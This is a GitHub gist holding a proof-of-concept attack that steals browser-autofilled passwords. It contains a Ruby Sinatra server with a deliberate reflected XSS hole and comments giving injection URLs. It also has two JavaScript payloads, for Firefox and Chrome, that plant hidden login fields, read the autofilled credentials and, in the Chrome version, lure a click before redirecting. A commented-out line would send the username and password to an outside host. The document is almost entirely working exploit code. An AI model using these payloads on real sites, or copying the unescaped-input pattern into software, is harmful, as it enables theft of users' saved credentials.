Last active
May 9, 2022 21:24
-
-
Save 73696e65/14a82a927ae063d446c64b87ac17c125 to your computer and use it in GitHub Desktop.
Autocomplete Password Stealing PoC (FF & Chrome)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
require 'rubygems' | |
require 'thin' | |
require 'rack' | |
require 'sinatra' | |
# python -m SimpleHTTPServer | |
# ruby ./server | |
# http://127.0.0.1:4000/?lang='><script>alert()</script> | |
# http://127.0.0.1:4000/?lang='><script src="http://127.0.0.1:8000/stealCreds-innerHTML.js"></script> | |
# http://127.0.0.1:4000/?lang='><script src="http://127.0.0.1:8000/stealCreds-onClick.js"></script><!-- | |
class InjectDemo < Sinatra::Base | |
get "/login" do | |
" | |
<form method='POST' action='/'> | |
Username: <input id='username' type='text' value='' /><br /> | |
Password: <input id='password' type='password' value='' /><br /> | |
<input type='submit' value='Submit' submit='/' /> | |
</form> | |
" | |
end | |
get "/" do | |
lang = request['lang'] || "en_US"; | |
" | |
<div align=center> | |
To login, go to the login page at | |
<a href='http://127.0.0.1:4000/login?lang=#{lang}'>http://127.0.0.1/login</a> | |
</div> | |
" | |
end | |
post "/" do | |
" | |
<meta http-equiv='refresh' content='1;url='http://127.0.0.1:4000'> | |
" | |
end | |
end | |
@routes = { | |
"/" => InjectDemo.new | |
} | |
@rack_app = Rack::URLMap.new(@routes) | |
@thin = Thin::Server.new("127.0.0.1", 4000, @rack_app) | |
Thin::Logging.silent = true | |
Thin::Logging.debug = false | |
puts "[#{Time.now}] Thin ready" | |
@thin.start |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Autocomplete Password Stealing for Firefox */ | |
// Configuration | |
user_id = "username"; | |
pass_id = "password"; | |
remembered = ''; // Stored UserName | |
// End of configuration | |
function stealCreds() { | |
un = pw = ""; | |
un = document.getElementById(user_id).value; | |
pw = document.getElementById(pass_id).value; | |
// new Image().src = "http://example.com/?" + un + "-" + pw; | |
console.log(un + "-" + pw); | |
window.clearInterval(check); | |
} | |
function appendDiv() { | |
var div = document.createElement("div"); | |
div.id = 'myform'; | |
div.innerHTML = "<input type='text' name='" + user_id + "' id='" + user_id + "' value='" + remembered + "' autocomplete='on'>" + | |
"<input type='password' name='" + pass_id + "' id='" + pass_id + "' value='' autocomplete='on'>"; | |
document.getElementsByTagName("body")[0].appendChild(div); | |
document.getElementById('myform').style.visibility = 'hidden'; | |
} | |
appendDiv(); | |
check = window.setInterval("stealCreds();", 2000); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Autocomplete Password Stealing for Chrome */ | |
// Configuration | |
user_id = "username"; | |
pass_id = "password"; | |
remembered = ''; // Stored UserName | |
message = "<b>Please click here to refresh</b>"; | |
redirect_to = 'http://127.0.0.1:4000' | |
// End of configuration | |
function stealCreds() { | |
un = pw = ""; | |
un = document.getElementById(user_id).value; | |
pw = document.getElementById(pass_id).value; | |
// new Image().src = "http://example.com/?" + un + "-" + pw; | |
console.log(un + "-" + pw); | |
} | |
function appendDiv() { | |
var div = document.createElement("div"); | |
div.id = 'myform'; | |
div.innerHTML = "<input type='text' name='" + user_id + "' id='" + user_id + "' value='" + remembered + "' autocomplete='on'>" + | |
"<input type='password' name='" + pass_id + "' id='" + pass_id + "' value='' autocomplete='on'>"; | |
document.getElementsByTagName("body")[0].appendChild(div); | |
document.getElementById('myform').style.visibility = 'hidden'; | |
} | |
function showMsg() { | |
var p = document.createElement("p"); | |
p.innerHTML = message; | |
document.getElementsByTagName("body")[0].appendChild(p); | |
} | |
appendDiv(); | |
showMsg(); | |
window.onclick = function() { | |
stealCreds(); | |
document.location = redirect_to; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment